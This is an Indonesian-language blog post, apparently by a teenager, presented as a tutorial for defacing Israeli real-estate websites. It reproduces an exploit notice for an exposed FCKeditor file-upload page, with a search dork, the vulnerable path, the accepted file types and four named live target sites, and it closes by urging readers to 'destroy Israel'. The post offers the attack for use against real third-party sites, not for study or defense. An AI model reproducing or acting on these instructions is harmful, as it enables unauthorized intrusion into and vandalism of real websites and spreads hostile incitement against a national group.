Deface Situs Israel : Powered By Real Estate



Assalamualaikum saudara saudara muslim sebangsa dan setanah air 🙂 kembali bertemu dengan saya Z..., ya si kalian bisa panggil saya NubyChan terserah deh kalian mau panggil aku apa? Haha.
Baiklah saya akan share tutorial deface khusus situs ISRAEL, karena saya baru nemuin nya, semalem lah tgl 28 juli , sekarang kan tgl 2 hehe, ok ni simak aja




Exploit Title: Powered by Real Estate in Israel File Upload Vulnerability
Dork: intext:Powered by Real Estate in Israel
Author: BadBoy
Category: Remote, Webapps
Tested on: Windows Xp SP3

Poc/Exploit:
http://[localhost]/PATCH//FCKeditor/editor/filemanager/connectors/uploadtest.html
Allowed File:
You can upload pdf ,ppt ,txt ,doc ,rtf ,xml ,xsl ,dtd ,zip ,rar ,jpg ,png files
Preview:
– You can see if you success upload file.
Live Target:
– http://www.firstimmo1.com/FCKeditor/editor/filemanager/connectors/uploadtest.html
– http://www.tekoa-realty.com/FCKeditor/editor/filemanager/connectors/uploadtest.html
– http://www.ozma-nechasim.co.il/FCKeditor/editor/filemanager/connectors/uploadtest.html
– http://www.ruben1.com/FCKeditor/editor/filemanager/connectors/uploadtest.html
==================================================

Apa pendapat kalian? Pasti mudahkan, karena saya tidak ingin memberikan materi SQL, saya rasa anak kecil pun bisa SQL hehe, sekarang bagaimana kita bermain exploit dengan menyerang URL 🙂
Ok semoga berguna ya, semangat hancurkan ISRAEL, sumpah dari umur saya 11 thn dan sekarang 16 thn, saya sudah mendukung gerakan Freedom Palestina !! Support dan bantu Palestina saudara  😊

Post a Comment

0 Comments